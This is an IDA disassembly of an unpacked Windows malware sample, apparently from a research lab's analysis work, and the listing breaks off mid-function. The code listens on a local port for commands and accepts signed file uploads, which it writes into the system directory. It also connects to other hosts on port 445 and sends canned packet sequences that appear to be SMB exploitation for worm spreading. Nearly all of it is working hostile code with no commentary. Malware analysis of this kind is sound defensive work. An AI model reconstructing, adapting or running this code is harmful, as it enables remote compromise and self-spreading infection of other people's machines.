;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : DFB15F5463ED2A36CE02594CE86D9E3C
; File Name : u:\work\dfb15f5463ed2a36ce02594ce86d9e3c_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31200000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31201000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31201000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31201004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31201008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3120100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_312033EE+1D�r
dword_31201010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31201014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_312033EE+4E�r ...
dword_31201018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3120101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31201020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31201024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31201028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHash ; sub_31201248+FD�r
dword_3120102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31201030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31201034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31201038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31201040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31201044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31201048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3120104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31201050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31201054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31201058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3120105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31201060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31201064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31201068 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_3120106C dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_312035F2+F�r
dword_31201070 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_312035F2+C3�r
dword_31201074 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_31201078 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_3120107C dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_31203196+3E�r ...
dword_31201080 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_31201084 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_31201088 dd 7C830D74h, 7C80D262h; resolved to->KERNEL32.lstrcmpA ; sub_31202786:loc_312029CD�r ...
dword_31201090 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_3120266C+3D�r ...
dword_31201094 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; UPX0:312025D4�r ...
dword_31201098 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_31201248:loc_31201329�r ...
dword_3120109C dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_312010A0 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_31202405+A�r
dword_312010A4 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_31201582+66�r ...
dword_312010A8 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_3120266C+ED�r
dword_312010AC dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_3120266C+8F�r ...
dword_312010B0 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_31201651+4F�r ...
dword_312010B4 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_31201361+14B�r
dword_312010B8 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31201361+13E�r ...
dword_312010BC dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31202280+66�r ...
dword_312010C0 dd 7C80A017h ; resolved to->KERNEL32.SetEvent ; sub_31202E66+51�r
dword_312010C4 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_31202E52+8�r
dword_312010C8 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31202AD9+12�r ...
dword_312010CC dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_31202E66+2E�r
dword_312010D0 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31201651+272�r ...
dword_312010D4 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31201E80+A4�r ...
dword_312010D8 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_312010DC dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31201C40+2C�r
dword_312010E0 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31202E66+93�r
dword_312010E4 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_312010E8 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3120349A+92�r
dword_312010EC dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31202DEA�r
dword_312010F0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_31202786+1E�r ...
align 8
dword_312010F8 dd 77C46030h ; resolved to->MSVCRT.strcpydword_312010FC dd 77C46040h ; resolved to->MSVCRT.strcat; ---------------------------------------------------------------------------
loc_31201100: ; DATA XREF: UPX0:loc_31203816�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31201104 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_31201108 dd 77C371BCh ; resolved to->MSVCRT.srand ; sub_31202A9C+22�r
; ---------------------------------------------------------------------------
loc_3120110C: ; DATA XREF: sub_31203810�r
cmp [edi], ah
retn 0FA77h ; DATA XREF: UPX0:loc_31203800�r
; ---------------------------------------------------------------------------
db 27h, 0C2h, 77h
dword_31201114 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_312020C2+16�r ...
dword_31201118 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31202786+BD�r
dword_3120111C dd 77C478A0h ; resolved to->MSVCRT.strlendword_31201120 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_31201124 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_31201128 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31202217+C�r ...
align 10h
dword_31201130 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31201E80+8D�r ...
dword_31201134 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31201138 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_3120113C dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId dd 0
dword_31201144 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_31201148 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; sub_312032DA+2B�r
dword_3120114C dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlAdword_31201150 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile align 8
dword_31201158 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_3120115C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31201160 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31201164 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31201168 dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_3120116C dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_31202BD5+25�r
dword_31201170 dd 71AB2DC0h ; resolved to->WS2_32.selectdword_31201174 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoadword_31201178 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_31201E80+46�r
dword_3120117C dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31202C2A+33�r
dword_31201180 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_31201651+2B�r ...
dword_31201184 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_31201651+147�r ...
dword_31201188 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_31202C78+100�r ...
dword_3120118C dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_31202C78+10D�r ...
dword_31201190 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_31202C78+120�r ...
dword_31201194 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31201651+559�r ...
dword_31201198 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31201361+D9�r ...
dword_3120119C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31201361+95�r ...
dd 2 dup(0)
dword_312011A8 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
sub_312011C0 proc near ; CODE XREF: sub_312014E6+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31201094 ; lstrcpyA
mov eax, esi
pop esi
retn
sub_312011C0 endp
; =============== S U B R O U T I N E =======================================
sub_312011D9 proc near ; CODE XREF: sub_312014E6+3A�p
push ebx
push ebp
mov ebx, dword_31201034
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+10h]
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31201208
push 8
push 1
push ebp
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31201208
push 1
pop eax
jmp short loc_31201228
; ---------------------------------------------------------------------------
loc_31201208: ; CODE XREF: sub_312011D9+1B�j
; sub_312011D9+28�j
add edi, 14h
push edi
push ebp
push ebp
push 114h
push offset dword_31205000
push dword ptr [esi]
call dword_31201038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31201228: ; CODE XREF: sub_312011D9+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_312011D9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3120122D proc near ; CODE XREF: sub_312014E6+7E�p
push esi
mov esi, ecx
push dword ptr [esi+14h]
call dword_3120102C ; CryptDestroyKey
push 0
push dword ptr [esi+10h]
call dword_31201030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3120122D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31201248 proc near ; CODE XREF: sub_312014E6+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_312010A0 ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_3120109C ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_31203794
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_31201198 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_312037BA ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_31201329
jl short loc_312012B6
cmp ecx, 61C46800h
ja short loc_31201329
loc_312012B6: ; CODE XREF: sub_31201248+64�j
cmp eax, 0FFFFFFF7h
jl short loc_31201329
jg short loc_312012C5
cmp ecx, 9E3B9800h
jb short loc_31201329
loc_312012C5: ; CODE XREF: sub_31201248+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+10h]
call dword_3120101C ; CryptCreateHash
test eax, eax
jz short loc_3120131A
push 0
push 8
push esi
push [ebp+var_4]
call dword_31201020 ; CryptHashData
test eax, eax
jz short loc_3120131A
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_3120131A
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+14h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31201024 ; CryptVerifySignatureA
test eax, eax
jnz short loc_31201342
loc_3120131A: ; CODE XREF: sub_31201248+98�j
; sub_31201248+AA�j ...
call dword_31201098 ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_31201028 ; CryptDestroyHash
loc_31201329: ; CODE XREF: sub_31201248+62�j
; sub_31201248+6C�j ...
call dword_31201098 ; RtlGetLastWin32Error
push 2
pop esi
loc_31201332: ; CODE XREF: sub_31201248+117�j
push edi
call sub_312037A8
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31201342: ; CODE XREF: sub_31201248+D0�j
push [ebp+var_4]
call dword_31201028 ; CryptDestroyHash
call dword_31201128 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_3120119C ; send
jmp short loc_31201332
sub_31201248 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31201361 proc near ; CODE XREF: sub_312014E6+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_31201380
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_312014D8
; ---------------------------------------------------------------------------
loc_31201380: ; CODE XREF: sub_31201361+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31201491
lea eax, [ebp+var_220]
push ebx
push eax
call dword_312010B8 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_312010B4 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_312010B0 ; lstrcpynA
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_312010AC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_3120147F
mov ebx, dword_3120119C
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; send
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31201427
inc [ebp+arg_4]
loc_31201427: ; CODE XREF: sub_31201361+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31201474
loc_31201431: ; CODE XREF: sub_31201361+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31201474
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_312010A8 ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; send
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31201431
loc_31201474: ; CODE XREF: sub_31201361+CE�j
; sub_31201361+E5�j
push [ebp+var_C]
call dword_312010A4 ; CloseHandle
jmp short loc_312014E1
; ---------------------------------------------------------------------------
loc_3120147F: ; CODE XREF: sub_31201361+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_3120119C ; send
loc_31201491: ; CODE XREF: sub_31201361+31�j
cmp [ebp+arg_4], 1
jnz short loc_312014C0
lea eax, [ebp+var_118]
push ebx
push eax
call dword_312010B8 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_312010B4 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_3120119C ; send
loc_312014C0: ; CODE XREF: sub_31201361+134�j
cmp [ebp+arg_4], 3
jnz short loc_312014E1
push dword ptr [edi]
add edi, 4
push edi
call sub_31202B44
pop ecx
pop ecx
push 0
push 4
push esi
loc_312014D8: ; CODE XREF: sub_31201361+1A�j
push [ebp+arg_0]
call dword_3120119C ; send
loc_312014E1: ; CODE XREF: sub_31201361+11C�j
; sub_31201361+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_31201361 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_312014E6 proc near ; DATA XREF: sub_31201582+AA�o
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_31202A9C
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_18]
rep movsd
push [ebp+var_4]
call dword_312010C0 ; SetEvent
mov esi, 10000h
push esi
call sub_31203794
pop ecx
mov edi, eax
lea ecx, [ebp+var_30]
call sub_312011C0
lea ecx, [ebp+var_30]
call sub_312011D9
lea eax, [ebp+var_18]
lea ecx, [ebp+var_30]
push eax
call sub_31201248
test eax, eax
jnz short loc_3120155A
loc_31201535: ; CODE XREF: sub_312014E6+72�j
push 0
push esi
push edi
push [ebp+var_18]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_3120155A
test eax, eax
jz short loc_3120155A
push eax
push edi
push [ebp+var_18]
call sub_31201361
add esp, 0Ch
jmp short loc_31201535
; ---------------------------------------------------------------------------
loc_3120155A: ; CODE XREF: sub_312014E6+4D�j
; sub_312014E6+5F�j ...
push edi
call sub_312037A8
pop ecx
lea ecx, [ebp+var_30]
call sub_3120122D
push [ebp+var_18]
call dword_31201194 ; closesocket
push 0
call dword_312010BC ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_312014E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31201582 proc near ; DATA XREF: sub_31202E66+F8�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_31201180 ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_312037C0 ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_312015B3: ; CODE XREF: sub_31201582+59�j
lea eax, [esi+0BFBh]
push eax
call dword_31201184 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31201188 ; bind
test eax, eax
jz short loc_312015DD
inc esi
cmp esi, 0Ah
jl short loc_312015B3
loc_312015DD: ; CODE XREF: sub_31201582+53�j
push 32h
push [ebp+var_4]
call dword_3120118C ; listen
mov ebx, dword_312010A4
loc_312015EE: ; CODE XREF: sub_31201582+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31201190 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_312010CC ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_312014E6
push esi
push esi
call dword_312010C8 ; CreateThread
push eax
call ebx ; CloseHandle
push 3E8h
push [ebp+var_30]
call dword_312010C4 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; CloseHandle
jmp short loc_312015EE
sub_31201582 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31201651 proc near ; CODE XREF: sub_31203136+35�p
; sub_31203196+47�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_312037D0
mov eax, dword_31205B0C
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31205B10
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31201180 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31201BB1
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31201174 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_312010B0 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31205B00
push eax
call dword_31201130 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_312016C4: ; CODE XREF: sub_31201651+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_312016C4
push 60h
lea eax, [ebp+var_E4]
push offset dword_31205614
push eax
call sub_312037BA ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_312037C6 ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_312037BA ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_312037C6 ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_312037BA ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_312037C6 ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_312037BA ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_312037C6 ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_312037BA ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_312037C0 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_312037C0 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31201184 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31201178 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31201BA7
mov esi, dword_312010D4
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_3120119C
push 89h
push offset dword_312053FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31201B9C
push 0
push 0A8h
push offset dword_31205488
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31201B9C
push 0
push 0DEh
push offset dword_31205534
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31201B9C
cmp eax, 46h
jl loc_31201B9C
cmp [ebp+var_730], 31h
jnz loc_31201A47
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_312037C0 ; memset
add esp, 0Ch
push offset loc_31205120
call dword_312010D0 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset loc_31205120
push eax
call sub_312037BA ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_312010D0 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_312037BA ; memcpy
mov eax, dword_31205A40
add esp, 0Ch
mov [ebp+var_798], eax
loc_312018E8: ; CODE XREF: sub_31201651+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31201B9C
push 0
push 68h
push offset dword_31205678
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31201B9C
push 0
push 0A0h
push offset dword_312056E4
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31201B9C
cmp [ebp+arg_0], 0
jz loc_31201B37
push 68h
lea eax, [ebp+var_89E4]
push offset dword_3120589C
push eax
call sub_312037BA ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_312037BA ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31205908
push eax
call sub_312037BA ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_312037BA ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_3120597C
push eax
call sub_312037BA ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31201B9C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31201B8F
; ---------------------------------------------------------------------------
loc_31201A47: ; CODE XREF: sub_31201651+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_312037C0 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31205A7C
push eax
call sub_312037BA ; memcpy
push offset loc_31205120
call sub_312037C6 ; strlen
push eax
